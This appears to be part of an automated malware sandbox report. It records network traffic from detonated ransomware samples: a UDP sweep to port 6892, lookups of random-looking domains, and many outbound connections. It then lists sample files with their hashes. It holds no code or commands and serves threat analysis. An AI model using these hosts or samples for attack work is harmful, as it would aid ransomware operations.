| LT | 194.165.16.105:6892 | udp | |
| LT | 194.165.16.106:6892 | udp | |
| LT | 194.165.16.107:6892 | udp | |
| LT | 194.165.16.108:6892 | udp | |
| LT | 194.165.16.109:6892 | udp | |
| LT | 194.165.16.110:6892 | udp | |
| LT | 194.165.16.111:6892 | udp | |
| LT | 194.165.16.112:6892 | udp | |
| LT | 194.165.16.113:6892 | udp | |
| LT | 194.165.16.114:6892 | udp | |
| LT | 194.165.16.115:6892 | udp | |
| LT | 194.165.16.116:6892 | udp | |
| LT | 194.165.16.117:6892 | udp | |
| LT | 194.165.16.118:6892 | udp | |
| LT | 194.165.16.119:6892 | udp | |
| LT | 194.165.16.120:6892 | udp | |
| LT | 194.165.16.121:6892 | udp | |
| LT | 194.165.16.122:6892 | udp | |
| LT | 194.165.16.123:6892 | udp | |
| LT | 194.165.16.124:6892 | udp | |
| LT | 194.165.16.125:6892 | udp | |
| LT | 194.165.16.126:6892 | udp | |
| LT | 194.165.16.127:6892 | udp | |
| LT | 194.165.16.128:6892 | udp | |
| LT | 194.165.16.129:6892 | udp | |
| LT | 194.165.16.130:6892 | udp | |
| LT | 194.165.16.131:6892 | udp | |
| LT | 194.165.16.132:6892 | udp | |
| LT | 194.165.16.133:6892 | udp | |
| LT | 194.165.16.134:6892 | udp | |
| LT | 194.165.16.135:6892 | udp | |
| LT | 194.165.16.136:6892 | udp | |
| LT | 194.165.16.137:6892 | udp | |
| LT | 194.165.16.138:6892 | udp | |
| LT | 194.165.16.139:6892 | udp | |
| LT | 194.165.16.140:6892 | udp | |
| LT | 194.165.16.141:6892 | udp | |
| LT | 194.165.16.142:6892 | udp | |
| LT | 194.165.16.143:6892 | udp | |
| LT | 194.165.16.144:6892 | udp | |
| LT | 194.165.16.145:6892 | udp | |
| LT | 194.165.16.146:6892 | udp | |
| LT | 194.165.16.147:6892 | udp | |
| LT | 194.165.16.148:6892 | udp | |
| LT | 194.165.16.149:6892 | udp | |
| LT | 194.165.16.150:6892 | udp | |
| LT | 194.165.16.151:6892 | udp | |
| LT | 194.165.16.152:6892 | udp | |
| LT | 194.165.16.153:6892 | udp | |
| LT | 194.165.16.154:6892 | udp | |
| LT | 194.165.16.155:6892 | udp | |
| LT | 194.165.16.156:6892 | udp | |
| LT | 194.165.16.157:6892 | udp | |
| LT | 194.165.16.158:6892 | udp | |
| LT | 194.165.16.159:6892 | udp | |
| LT | 194.165.16.160:6892 | udp | |
| LT | 194.165.16.161:6892 | udp | |
| LT | 194.165.16.162:6892 | udp | |
| LT | 194.165.16.163:6892 | udp | |
| LT | 194.165.16.164:6892 | udp | |
| LT | 194.165.16.165:6892 | udp | |
| LT | 194.165.16.166:6892 | udp | |
| LT | 194.165.16.167:6892 | udp | |
| LT | 194.165.16.168:6892 | udp | |
| LT | 194.165.16.169:6892 | udp | |
| LT | 194.165.16.170:6892 | udp | |
| LT | 194.165.16.171:6892 | udp | |
| LT | 194.165.16.172:6892 | udp | |
| LT | 194.165.16.173:6892 | udp | |
| LT | 194.165.16.174:6892 | udp | |
| LT | 194.165.16.175:6892 | udp | |
| LT | 194.165.16.176:6892 | udp | |
| LT | 194.165.16.177:6892 | udp | |
| LT | 194.165.16.178:6892 | udp | |
| LT | 194.165.16.179:6892 | udp | |
| LT | 194.165.16.180:6892 | udp | |
| LT | 194.165.16.181:6892 | udp | |
| LT | 194.165.16.182:6892 | udp | |
| LT | 194.165.16.183:6892 | udp | |
| LT | 194.165.16.184:6892 | udp | |
| LT | 194.165.16.185:6892 | udp | |
| LT | 194.165.16.186:6892 | udp | |
| LT | 194.165.16.187:6892 | udp | |
| LT | 194.165.16.188:6892 | udp | |
| LT | 194.165.16.189:6892 | udp | |
| LT | 194.165.16.190:6892 | udp | |
| LT | 194.165.16.191:6892 | udp | |
| LT | 194.165.16.192:6892 | udp | |
| LT | 194.165.16.193:6892 | udp | |
| LT | 194.165.16.194:6892 | udp | |
| LT | 194.165.16.195:6892 | udp | |
| LT | 194.165.16.196:6892 | udp | |
| LT | 194.165.16.197:6892 | udp | |
| LT | 194.165.16.198:6892 | udp | |
| LT | 194.165.16.199:6892 | udp | |
| LT | 194.165.16.200:6892 | udp | |
| LT | 194.165.16.201:6892 | udp | |
| LT | 194.165.16.202:6892 | udp | |
| LT | 194.165.16.203:6892 | udp | |
| LT | 194.165.16.204:6892 | udp | |
| LT | 194.165.16.205:6892 | udp | |
| LT | 194.165.16.206:6892 | udp | |
| LT | 194.165.16.207:6892 | udp | |
| LT | 194.165.16.208:6892 | udp | |
| LT | 194.165.16.209:6892 | udp | |
| LT | 194.165.16.210:6892 | udp | |
| LT | 194.165.16.211:6892 | udp | |
| LT | 194.165.16.212:6892 | udp | |
| LT | 194.165.16.213:6892 | udp | |
| LT | 194.165.16.214:6892 | udp | |
| LT | 194.165.16.215:6892 | udp | |
| LT | 194.165.16.216:6892 | udp | |
| LT | 194.165.16.217:6892 | udp | |
| LT | 194.165.16.218:6892 | udp | |
| LT | 194.165.16.219:6892 | udp | |
| LT | 194.165.16.220:6892 | udp | |
| LT | 194.165.16.221:6892 | udp | |
| LT | 194.165.16.222:6892 | udp | |
| LT | 194.165.16.223:6892 | udp | |
| LT | 194.165.16.224:6892 | udp | |
| LT | 194.165.16.225:6892 | udp | |
| LT | 194.165.16.226:6892 | udp | |
| LT | 194.165.16.227:6892 | udp | |
| LT | 194.165.16.228:6892 | udp | |
| LT | 194.165.16.229:6892 | udp | |
| LT | 194.165.16.230:6892 | udp | |
| LT | 194.165.16.231:6892 | udp | |
| LT | 194.165.16.232:6892 | udp | |
| LT | 194.165.16.233:6892 | udp | |
| LT | 194.165.16.234:6892 | udp | |
| LT | 194.165.16.235:6892 | udp | |
| LT | 194.165.16.236:6892 | udp | |
| LT | 194.165.16.237:6892 | udp | |
| LT | 194.165.16.238:6892 | udp | |
| LT | 194.165.16.239:6892 | udp | |
| LT | 194.165.16.240:6892 | udp | |
| LT | 194.165.16.241:6892 | udp | |
| LT | 194.165.16.242:6892 | udp | |
| LT | 194.165.16.243:6892 | udp | |
| LT | 194.165.16.244:6892 | udp | |
| LT | 194.165.16.245:6892 | udp | |
| LT | 194.165.16.246:6892 | udp | |
| LT | 194.165.16.247:6892 | udp | |
| LT | 194.165.16.248:6892 | udp | |
| LT | 194.165.16.249:6892 | udp | |
| LT | 194.165.16.250:6892 | udp | |
| LT | 194.165.16.251:6892 | udp | |
| LT | 194.165.16.252:6892 | udp | |
| LT | 194.165.16.253:6892 | udp | |
| LT | 194.165.16.254:6892 | udp | |
| LT | 194.165.16.255:6892 | udp | |
| LT | 194.165.17.0:6892 | udp | |
| LT | 194.165.17.1:6892 | udp | |
| LT | 194.165.17.2:6892 | udp | |
| LT | 194.165.17.3:6892 | udp | |
| LT | 194.165.17.4:6892 | udp | |
| LT | 194.165.17.5:6892 | udp | |
| LT | 194.165.17.6:6892 | udp | |
| LT | 194.165.17.7:6892 | udp | |
| LT | 194.165.17.8:6892 | udp | |
| LT | 194.165.17.9:6892 | udp | |
| LT | 194.165.17.10:6892 | udp | |
| LT | 194.165.17.11:6892 | udp | |
| LT | 194.165.17.12:6892 | udp | |
| LT | 194.165.17.13:6892 | udp | |
| LT | 194.165.17.14:6892 | udp | |
| LT | 194.165.17.15:6892 | udp | |
| LT | 194.165.17.16:6892 | udp | |
| LT | 194.165.17.17:6892 | udp | |
| LT | 194.165.17.18:6892 | udp | |
| LT | 194.165.17.19:6892 | udp | |
| LT | 194.165.17.20:6892 | udp | |
| LT | 194.165.17.21:6892 | udp | |
| LT | 194.165.17.22:6892 | udp | |
| LT | 194.165.17.23:6892 | udp | |
| LT | 194.165.17.24:6892 | udp | |
| LT | 194.165.17.25:6892 | udp | |
| LT | 194.165.17.26:6892 | udp | |
| LT | 194.165.17.27:6892 | udp | |
| LT | 194.165.17.28:6892 | udp | |
| LT | 194.165.17.29:6892 | udp | |
| LT | 194.165.17.30:6892 | udp | |
| LT | 194.165.17.31:6892 | udp | |
| LT | 194.165.17.32:6892 | udp | |
| LT | 194.165.17.33:6892 | udp | |
| LT | 194.165.17.34:6892 | udp | |
| LT | 194.165.17.35:6892 | udp | |
| LT | 194.165.17.36:6892 | udp | |
| LT | 194.165.17.37:6892 | udp | |
| LT | 194.165.17.38:6892 | udp | |
| LT | 194.165.17.39:6892 | udp | |
| LT | 194.165.17.40:6892 | udp | |
| LT | 194.165.17.41:6892 | udp | |
| LT | 194.165.17.42:6892 | udp | |
| LT | 194.165.17.43:6892 | udp | |
| LT | 194.165.17.44:6892 | udp | |
| LT | 194.165.17.45:6892 | udp | |
| LT | 194.165.17.46:6892 | udp | |
| LT | 194.165.17.47:6892 | udp | |
| LT | 194.165.17.48:6892 | udp | |
| LT | 194.165.17.49:6892 | udp | |
| LT | 194.165.17.50:6892 | udp | |
| LT | 194.165.17.51:6892 | udp | |
| LT | 194.165.17.52:6892 | udp | |
| LT | 194.165.17.53:6892 | udp | |
| LT | 194.165.17.54:6892 | udp | |
| LT | 194.165.17.55:6892 | udp | |
| LT | 194.165.17.56:6892 | udp | |
| LT | 194.165.17.57:6892 | udp | |
| LT | 194.165.17.58:6892 | udp | |
| LT | 194.165.17.59:6892 | udp | |
| LT | 194.165.17.60:6892 | udp | |
| LT | 194.165.17.61:6892 | udp | |
| LT | 194.165.17.62:6892 | udp | |
| LT | 194.165.17.63:6892 | udp | |
| LT | 194.165.17.64:6892 | udp | |
| LT | 194.165.17.65:6892 | udp | |
| LT | 194.165.17.66:6892 | udp | |
| LT | 194.165.17.67:6892 | udp | |
| LT | 194.165.17.68:6892 | udp | |
| LT | 194.165.17.69:6892 | udp | |
| LT | 194.165.17.70:6892 | udp | |
| LT | 194.165.17.71:6892 | udp | |
| LT | 194.165.17.72:6892 | udp | |
| LT | 194.165.17.73:6892 | udp | |
| LT | 194.165.17.74:6892 | udp | |
| LT | 194.165.17.75:6892 | udp | |
| LT | 194.165.17.76:6892 | udp | |
| LT | 194.165.17.77:6892 | udp | |
| LT | 194.165.17.78:6892 | udp | |
| LT | 194.165.17.79:6892 | udp | |
| LT | 194.165.17.80:6892 | udp | |
| LT | 194.165.17.81:6892 | udp | |
| LT | 194.165.17.82:6892 | udp | |
| LT | 194.165.17.83:6892 | udp | |
| LT | 194.165.17.84:6892 | udp | |
| LT | 194.165.17.85:6892 | udp | |
| LT | 194.165.17.86:6892 | udp | |
| LT | 194.165.17.87:6892 | udp | |
| LT | 194.165.17.88:6892 | udp | |
| LT | 194.165.17.89:6892 | udp | |
| LT | 194.165.17.90:6892 | udp | |
| LT | 194.165.17.91:6892 | udp | |
| LT | 194.165.17.92:6892 | udp | |
| LT | 194.165.17.93:6892 | udp | |
| LT | 194.165.17.94:6892 | udp | |
| LT | 194.165.17.95:6892 | udp | |
| LT | 194.165.17.96:6892 | udp | |
| LT | 194.165.17.97:6892 | udp | |
| LT | 194.165.17.98:6892 | udp | |
| LT | 194.165.17.99:6892 | udp | |
| LT | 194.165.17.100:6892 | udp | |
| LT | 194.165.17.101:6892 | udp | |
| LT | 194.165.17.102:6892 | udp | |
| LT | 194.165.17.103:6892 | udp | |
| LT | 194.165.17.104:6892 | udp | |
| LT | 194.165.17.105:6892 | udp | |
| LT | 194.165.17.106:6892 | udp | |
| LT | 194.165.17.107:6892 | udp | |
| LT | 194.165.17.108:6892 | udp | |
| LT | 194.165.17.109:6892 | udp | |
| LT | 194.165.17.110:6892 | udp | |
| LT | 194.165.17.111:6892 | udp | |
| LT | 194.165.17.112:6892 | udp | |
| LT | 194.165.17.113:6892 | udp | |
| LT | 194.165.17.114:6892 | udp | |
| LT | 194.165.17.115:6892 | udp | |
| LT | 194.165.17.116:6892 | udp | |
| LT | 194.165.17.117:6892 | udp | |
| LT | 194.165.17.118:6892 | udp | |
| LT | 194.165.17.119:6892 | udp | |
| LT | 194.165.17.120:6892 | udp | |
| LT | 194.165.17.121:6892 | udp | |
| LT | 194.165.17.122:6892 | udp | |
| LT | 194.165.17.123:6892 | udp | |
| LT | 194.165.17.124:6892 | udp | |
| LT | 194.165.17.125:6892 | udp | |
| LT | 194.165.17.126:6892 | udp | |
| LT | 194.165.17.127:6892 | udp | |
| LT | 194.165.17.128:6892 | udp | |
| LT | 194.165.17.129:6892 | udp | |
| LT | 194.165.17.130:6892 | udp | |
| LT | 194.165.17.131:6892 | udp | |
| LT | 194.165.17.132:6892 | udp | |
| LT | 194.165.17.133:6892 | udp | |
| LT | 194.165.17.134:6892 | udp | |
| LT | 194.165.17.135:6892 | udp | |
| LT | 194.165.17.136:6892 | udp | |
| LT | 194.165.17.137:6892 | udp | |
| LT | 194.165.17.138:6892 | udp | |
| LT | 194.165.17.139:6892 | udp | |
| LT | 194.165.17.140:6892 | udp | |
| LT | 194.165.17.141:6892 | udp | |
| LT | 194.165.17.142:6892 | udp | |
| LT | 194.165.17.143:6892 | udp | |
| LT | 194.165.17.144:6892 | udp | |
| LT | 194.165.17.145:6892 | udp | |
| LT | 194.165.17.146:6892 | udp | |
| LT | 194.165.17.147:6892 | udp | |
| LT | 194.165.17.148:6892 | udp | |
| LT | 194.165.17.149:6892 | udp | |
| LT | 194.165.17.150:6892 | udp | |
| LT | 194.165.17.151:6892 | udp | |
| LT | 194.165.17.152:6892 | udp | |
| LT | 194.165.17.153:6892 | udp | |
| LT | 194.165.17.154:6892 | udp | |
| LT | 194.165.17.155:6892 | udp | |
| LT | 194.165.17.156:6892 | udp | |
| LT | 194.165.17.157:6892 | udp | |
| LT | 194.165.17.158:6892 | udp | |
| LT | 194.165.17.159:6892 | udp | |
| LT | 194.165.17.160:6892 | udp | |
| LT | 194.165.17.161:6892 | udp | |
| LT | 194.165.17.162:6892 | udp | |
| LT | 194.165.17.163:6892 | udp | |
| LT | 194.165.17.164:6892 | udp | |
| LT | 194.165.17.165:6892 | udp | |
| LT | 194.165.17.166:6892 | udp | |
| LT | 194.165.17.167:6892 | udp | |
| LT | 194.165.17.168:6892 | udp | |
| LT | 194.165.17.169:6892 | udp | |
| LT | 194.165.17.170:6892 | udp | |
| LT | 194.165.17.171:6892 | udp | |
| LT | 194.165.17.172:6892 | udp | |
| LT | 194.165.17.173:6892 | udp | |
| LT | 194.165.17.174:6892 | udp | |
| LT | 194.165.17.175:6892 | udp | |
| LT | 194.165.17.176:6892 | udp | |
| LT | 194.165.17.177:6892 | udp | |
| LT | 194.165.17.178:6892 | udp | |
| LT | 194.165.17.179:6892 | udp | |
| LT | 194.165.17.180:6892 | udp | |
| LT | 194.165.17.181:6892 | udp | |
| LT | 194.165.17.182:6892 | udp | |
| LT | 194.165.17.183:6892 | udp | |
| LT | 194.165.17.184:6892 | udp | |
| LT | 194.165.17.185:6892 | udp | |
| LT | 194.165.17.186:6892 | udp | |
| LT | 194.165.17.187:6892 | udp | |
| LT | 194.165.17.188:6892 | udp | |
| LT | 194.165.17.189:6892 | udp | |
| LT | 194.165.17.190:6892 | udp | |
| LT | 194.165.17.191:6892 | udp | |
| LT | 194.165.17.192:6892 | udp | |
| LT | 194.165.17.193:6892 | udp | |
| LT | 194.165.17.194:6892 | udp | |
| LT | 194.165.17.195:6892 | udp | |
| LT | 194.165.17.196:6892 | udp | |
| LT | 194.165.17.197:6892 | udp | |
| LT | 194.165.17.198:6892 | udp | |
| LT | 194.165.17.199:6892 | udp | |
| LT | 194.165.17.200:6892 | udp | |
| LT | 194.165.17.201:6892 | udp | |
| LT | 194.165.17.202:6892 | udp | |
| LT | 194.165.17.203:6892 | udp | |
| LT | 194.165.17.204:6892 | udp | |
| LT | 194.165.17.205:6892 | udp | |
| LT | 194.165.17.206:6892 | udp | |
| LT | 194.165.17.207:6892 | udp | |
| LT | 194.165.17.208:6892 | udp | |
| LT | 194.165.17.209:6892 | udp | |
| LT | 194.165.17.210:6892 | udp | |
| LT | 194.165.17.211:6892 | udp | |
| LT | 194.165.17.212:6892 | udp | |
| LT | 194.165.17.213:6892 | udp | |
| LT | 194.165.17.214:6892 | udp | |
| LT | 194.165.17.215:6892 | udp | |
| LT | 194.165.17.216:6892 | udp | |
| LT | 194.165.17.217:6892 | udp | |
| LT | 194.165.17.218:6892 | udp | |
| LT | 194.165.17.219:6892 | udp | |
| LT | 194.165.17.220:6892 | udp | |
| LT | 194.165.17.221:6892 | udp | |
| LT | 194.165.17.222:6892 | udp | |
| LT | 194.165.17.223:6892 | udp | |
| LT | 194.165.17.224:6892 | udp | |
| LT | 194.165.17.225:6892 | udp | |
| LT | 194.165.17.226:6892 | udp | |
| LT | 194.165.17.227:6892 | udp | |
| LT | 194.165.17.228:6892 | udp | |
| LT | 194.165.17.229:6892 | udp | |
| LT | 194.165.17.230:6892 | udp | |
| LT | 194.165.17.231:6892 | udp | |
| LT | 194.165.17.232:6892 | udp | |
| LT | 194.165.17.233:6892 | udp | |
| LT | 194.165.17.234:6892 | udp | |
| LT | 194.165.17.235:6892 | udp | |
| LT | 194.165.17.236:6892 | udp | |
| LT | 194.165.17.237:6892 | udp | |
| LT | 194.165.17.238:6892 | udp | |
| LT | 194.165.17.239:6892 | udp | |
| LT | 194.165.17.240:6892 | udp | |
| LT | 194.165.17.241:6892 | udp | |
| LT | 194.165.17.242:6892 | udp | |
| LT | 194.165.17.243:6892 | udp | |
| LT | 194.165.17.244:6892 | udp | |
| LT | 194.165.17.245:6892 | udp | |
| LT | 194.165.17.246:6892 | udp | |
| LT | 194.165.17.247:6892 | udp | |
| LT | 194.165.17.248:6892 | udp | |
| LT | 194.165.17.249:6892 | udp | |
| LT | 194.165.17.250:6892 | udp | |
| LT | 194.165.17.251:6892 | udp | |
| LT | 194.165.17.252:6892 | udp | |
| LT | 194.165.17.253:6892 | udp | |
| LT | 194.165.17.254:6892 | udp | |
| US | 8.8.8.8:53 | kkhqfsbktnlqev.su | udp |
| US | 8.8.8.8:53 | xplddddkccleobj.biz | udp |
| LT | 194.165.17.255:6892 | udp | |
| US | 8.8.8.8:53 | mszarouni.ae | udp |
| US | 162.241.253.102:80 | mszarouni.ae | tcp |
| RU | 95.213.195.123:80 | tcp | |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| US | 69.32.115.83:80 | tcp | |
| KR | 180.239.59.88:443 | tcp | |
| ES | 62.15.68.17:80 | tcp | |
| US | 132.174.190.251:80 | tcp | |
| US | 22.92.19.221:80 | tcp | |
| US | 24.92.54.88:80 | tcp | |
| US | 44.219.48.25:80 | tcp | |
| US | 15.23.5.133:80 | tcp | |
| US | 152.194.128.119:80 | tcp | |
| US | 50.206.192.166:80 | tcp | |
| SI | 84.20.229.254:80 | tcp | |
| JP | 153.160.12.213:80 | tcp | |
| US | 8.8.8.8:53 | cngnfmrlo.fr | udp |
| N/A | 10.26.47.246:8080 | tcp | |
| MX | 168.165.177.27:80 | tcp | |
| JP | 119.241.145.105:80 | tcp | |
| US | 8.8.8.8:53 | tainuhnk.pm | udp |
| US | 162.241.253.102:80 | mszarouni.ae | tcp |
| US | 162.241.253.102:80 | mszarouni.ae | tcp |
| CN | 14.25.231.224:80 | tcp | |
| AT | 213.90.126.141:80 | tcp | |
| US | 8.8.8.8:53 | snibi.se | udp |
| US | 136.146.132.92:80 | tcp | |
| PL | 91.195.12.185:80 | tcp | |
| US | 141.238.82.26:80 | tcp | |
| ZA | 196.220.46.177:80 | tcp | |
| CN | 120.248.75.216:8080 | tcp | |
| US | 8.8.8.8:53 | danecobain.com | udp |
| NL | 96.127.186.146:80 | danecobain.com | tcp |
| ES | 85.217.152.1:8080 | tcp | |
| US | 214.101.200.115:80 | tcp | |
| RU | 91.142.90.61:80 | tcp | |
| NL | 96.127.186.146:443 | danecobain.com | tcp |
| US | 8.8.8.8:53 | ffoqr3ug7m726zou.ac7zvz.top | udp |
| US | 8.8.8.8:53 | www.danecobain.com | udp |
| NL | 96.127.186.146:443 | www.danecobain.com | tcp |
| US | 8.8.8.8:53 | btc.blockr.io | udp |
| US | 8.8.8.8:53 | rsyobihlpgoxuwr.org | udp |
| US | 8.8.8.8:53 | jessforkicks.com | udp |
| US | 8.8.8.8:53 | heizhuangym.com | udp |
| US | 162.249.65.21:80 | rsyobihlpgoxuwr.org | tcp |
| IN | 43.251.220.159:80 | tcp | |
| US | 17.236.196.4:80 | tcp | |
| US | 29.160.124.175:80 | tcp | |
| US | 8.8.8.8:53 | infotlogomas.malangkota.go.id | udp |
| IN | 117.209.155.225:80 | tcp | |
| US | 164.198.99.228:80 | tcp | |
| US | 198.61.196.250:443 | tcp | |
| US | 8.8.8.8:53 | csucanuevo.csuca.org | udp |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| US | 167.160.139.242:80 | tcp | |
| KE | 196.107.155.95:80 | tcp | |
| IN | 223.233.29.35:80 | tcp | |
| US | 15.230.172.180:80 | tcp | |
| US | 158.107.72.148:80 | tcp | |
| US | 184.49.221.193:80 | tcp | |
| BR | 191.246.235.116:443 | tcp | |
| US | 17.232.209.229:80 | tcp | |
| MX | 187.133.212.236:443 | tcp | |
| US | 206.137.99.24:80 | tcp | |
| US | 215.150.190.178:80 | tcp | |
| BA | 80.80.35.111:80 | tcp | |
| US | 98.96.123.169:80 | tcp | |
| AR | 152.168.244.67:80 | tcp | |
| US | 50.190.39.3:80 | tcp | |
| N/A | 10.174.186.179:80 | tcp | |
| US | 21.94.190.213:80 | tcp | |
| US | 64.60.186.108:80 | tcp | |
| US | 204.133.232.154:80 | tcp | |
| US | 8.8.8.8:53 | vdmsqqxfbwkd.tf | udp |
| KR | 211.244.218.183:80 | tcp | |
| US | 167.218.6.197:80 | tcp | |
| US | 16.105.182.188:8080 | tcp | |
| US | 8.8.8.8:53 | jsqggcqojuubfla.de | udp |
| US | 8.8.8.8:53 | bijkmvvjcqfbrx.eu | udp |
| NL | 96.127.186.146:80 | www.danecobain.com | tcp |
| US | 162.249.64.234:80 | bijkmvvjcqfbrx.eu | tcp |
| NL | 96.127.186.146:443 | www.danecobain.com | tcp |
| NL | 96.127.186.146:443 | www.danecobain.com | tcp |
| US | 166.105.18.86:80 | tcp | |
| US | 8.8.8.8:53 | pdrmfpwjigjkojx.work | udp |
| JP | 106.153.251.63:80 | tcp | |
| US | 8.8.8.8:53 | oxgwgd.tf | udp |
| CN | 36.209.131.73:80 | tcp | |
| US | 8.8.8.8:53 | pctdilkjbfqrpfr.org | udp |
| US | 162.249.65.21:80 | pctdilkjbfqrpfr.org | tcp |
| US | 167.89.248.112:80 | tcp | |
| CL | 43.175.59.192:80 | tcp | |
| CO | 191.89.69.207:80 | tcp | |
| US | 8.8.8.8:53 | avpbenc.click | udp |
| US | 155.29.123.86:80 | tcp | |
| US | 40.244.115.46:80 | tcp | |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| CN | 118.183.116.123:80 | tcp | |
| RU | 95.213.195.123:80 | tcp | |
| JP | 58.70.181.144:443 | tcp | |
| SK | 95.103.253.146:80 | tcp | |
| NL | 13.95.29.219:80 | tcp | |
| PL | 91.195.12.185:80 | tcp | |
| US | 26.182.211.107:80 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| NL | 104.97.14.209:80 | crl.microsoft.com | tcp |
| US | 20.191.114.183:80 | tcp | |
| SE | 81.232.235.68:80 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 23.200.189.225:80 | www.microsoft.com | tcp |
| CN | 161.120.99.63:80 | tcp | |
| US | 33.126.125.162:80 | tcp | |
| US | 147.75.192.129:8080 | tcp | |
| AU | 114.77.40.225:8080 | tcp | |
| US | 207.197.42.196:80 | tcp | |
| N/A | 127.60.48.9:80 | tcp | |
| CN | 49.73.135.252:80 | tcp | |
| PK | 39.48.152.217:80 | tcp | |
| JP | 153.178.32.2:80 | tcp | |
| CN | 110.189.139.161:80 | tcp | |
| JP | 133.173.20.32:80 | tcp | |
| US | 13.190.202.157:80 | tcp | |
| US | 155.116.10.98:80 | tcp | |
| US | 9.101.103.17:80 | tcp | |
| US | 19.106.34.244:80 | tcp | |
| US | 47.135.153.205:80 | tcp | |
| DE | 130.183.76.233:80 | tcp | |
| MY | 49.125.20.122:80 | tcp | |
| JP | 114.175.31.205:80 | tcp | |
| CN | 180.235.81.43:80 | tcp | |
| CN | 122.79.134.31:80 | tcp | |
| TR | 188.119.19.142:8080 | tcp | |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| US | 135.183.255.69:80 | tcp | |
| IN | 125.18.34.26:80 | tcp | |
| US | 173.230.71.21:443 | tcp | |
| US | 73.120.223.70:80 | tcp | |
| US | 38.29.81.252:443 | tcp | |
| US | 6.108.213.201:80 | tcp | |
| ZA | 102.141.248.13:80 | tcp | |
| US | 198.44.47.222:80 | tcp | |
| AU | 202.125.36.179:80 | tcp | |
| KR | 58.124.80.79:80 | tcp | |
| CN | 202.171.220.150:80 | tcp | |
| FR | 77.207.39.241:8080 | tcp | |
| PL | 151.115.105.10:80 | tcp | |
| ME | 37.122.166.45:80 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| JP | 202.51.9.91:80 | tcp | |
| CN | 111.32.15.223:80 | tcp | |
| RU | 188.75.223.175:80 | tcp | |
| JP | 202.51.9.91:80 | 202.51.9.91 | tcp |
| NL | 194.109.206.212:443 | tcp | |
| US | 8.8.8.8:53 | okepi.net | udp |
| JP | 202.51.9.91:443 | okepi.net | tcp |
| CN | 27.190.51.182:8080 | tcp | |
| US | 3.58.52.121:80 | tcp | |
| US | 135.191.61.106:80 | tcp | |
| US | 69.91.55.198:80 | tcp | |
| US | 73.178.234.32:80 | tcp | |
| DE | 84.56.46.131:80 | tcp | |
| US | 162.249.64.234:80 | bijkmvvjcqfbrx.eu | tcp |
| CH | 171.25.25.223:8080 | tcp | |
| SE | 88.83.47.12:80 | tcp | |
| KR | 58.239.57.144:80 | tcp | |
| US | 164.210.85.253:80 | tcp | |
| US | 171.132.58.51:80 | tcp | |
| FR | 86.229.43.42:80 | tcp | |
| CN | 122.241.20.191:8080 | tcp | |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| CN | 220.203.101.153:80 | tcp | |
| SA | 91.195.89.5:80 | tcp | |
| US | 32.181.227.214:80 | tcp | |
| ES | 37.223.140.21:80 | tcp | |
| US | 140.107.56.248:80 | tcp | |
| PL | 91.195.12.185:80 | tcp | |
| US | 128.173.27.230:80 | tcp | |
| KR | 221.154.8.15:80 | tcp | |
| DE | 51.207.168.166:8080 | tcp | |
| MX | 189.136.125.65:80 | tcp | |
| US | 159.49.17.161:8080 | tcp | |
| TN | 102.154.175.24:80 | tcp | |
| PL | 94.40.122.229:80 | tcp | |
| CN | 222.35.97.68:80 | tcp | |
| US | 140.215.6.97:80 | tcp | |
| JP | 39.111.203.136:80 | tcp | |
| N/A | 10.41.209.5:80 | tcp | |
| SI | 193.2.167.204:443 | tcp | |
| US | 21.204.152.61:80 | tcp | |
| BE | 176.62.167.216:80 | tcp | |
| IT | 2.194.12.46:80 | tcp | |
| RU | 158.160.32.198:80 | tcp | |
| US | 170.152.137.190:80 | tcp | |
| CN | 43.238.131.33:443 | tcp | |
| DE | 84.191.43.150:443 | tcp | |
| CO | 190.159.154.119:80 | tcp | |
| BR | 186.212.160.211:80 | tcp | |
| US | 96.193.142.96:80 | tcp | |
| CN | 121.77.133.9:80 | tcp | |
| CN | 101.36.235.195:80 | tcp | |
| US | 54.84.55.49:80 | www.wikitweak.com | tcp |
| JP | 133.43.168.185:80 | tcp | |
| AU | 101.182.195.91:80 | tcp | |
| CA | 206.167.34.197:80 | tcp | |
| MX | 170.169.231.113:80 | tcp | |
| HK | 61.93.62.18:80 | tcp | |
| US | 51.216.67.61:80 | tcp | |
| US | 12.192.148.112:80 | tcp | |
| US | 151.188.220.227:80 | tcp | |
| ES | 37.29.159.115:80 | tcp | |
| US | 162.249.64.234:80 | bijkmvvjcqfbrx.eu | tcp |
| US | 161.71.243.51:80 | tcp | |
| US | 6.189.25.241:80 | tcp | |
| CA | 142.98.145.180:80 | tcp | |
| BR | 191.189.236.128:80 | tcp | |
| GB | 163.170.234.220:80 | tcp | |
| US | 75.245.47.104:80 | tcp |
Files
memory/2696-30-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2696-31-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.MSIL.Foreign.gen-d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d.exe
| MD5 | b26554dfcaad57d7e0464df224333f69 |
| SHA1 | 163214f9de404810f999002e916b97c0b9290518 |
| SHA256 | d3585f6d8260f3af04debbcd9ef854d6763c5ec42c42610a6fb219f0c33f325d |
| SHA512 | 33cecb0eab19be2902f8703b30c936a17270ccd89702ea66ef683fc50b8647980b20342697f9e63c270d7bbe1bdeabf638226fa3e2b4d263712cda3d1032b79c |
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.NSIS.Shade.gen-d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65.exe
| MD5 | d2fdf1966b09fb6c527aa173adc85a43 |
| SHA1 | 7686bc0b043a50986613f497bc25396489b610e4 |
| SHA256 | d1f89325958075f2c5844522563cbc91019828b9e29758de4e2b621548d4cb65 |
| SHA512 | fa0b3250b1f697b64cef65675b6e28a1b91393afdf4743e733cb19b9f227e8c792cbceb3bdbaeeb31bd3cbff3a5031d9e3427502788a2f6c60d29e1b98504915 |
C:\Users\Admin\Desktop\00272\HEUR-Trojan-Ransom.Win32.Agent.gen-06bcdd333935c1f1c251ee836533f2330030eaf5d37444a6dd86732cf9370b5b.exe
| MD5 | cbdd3513fc147102fb527ffe27a5fe07 |
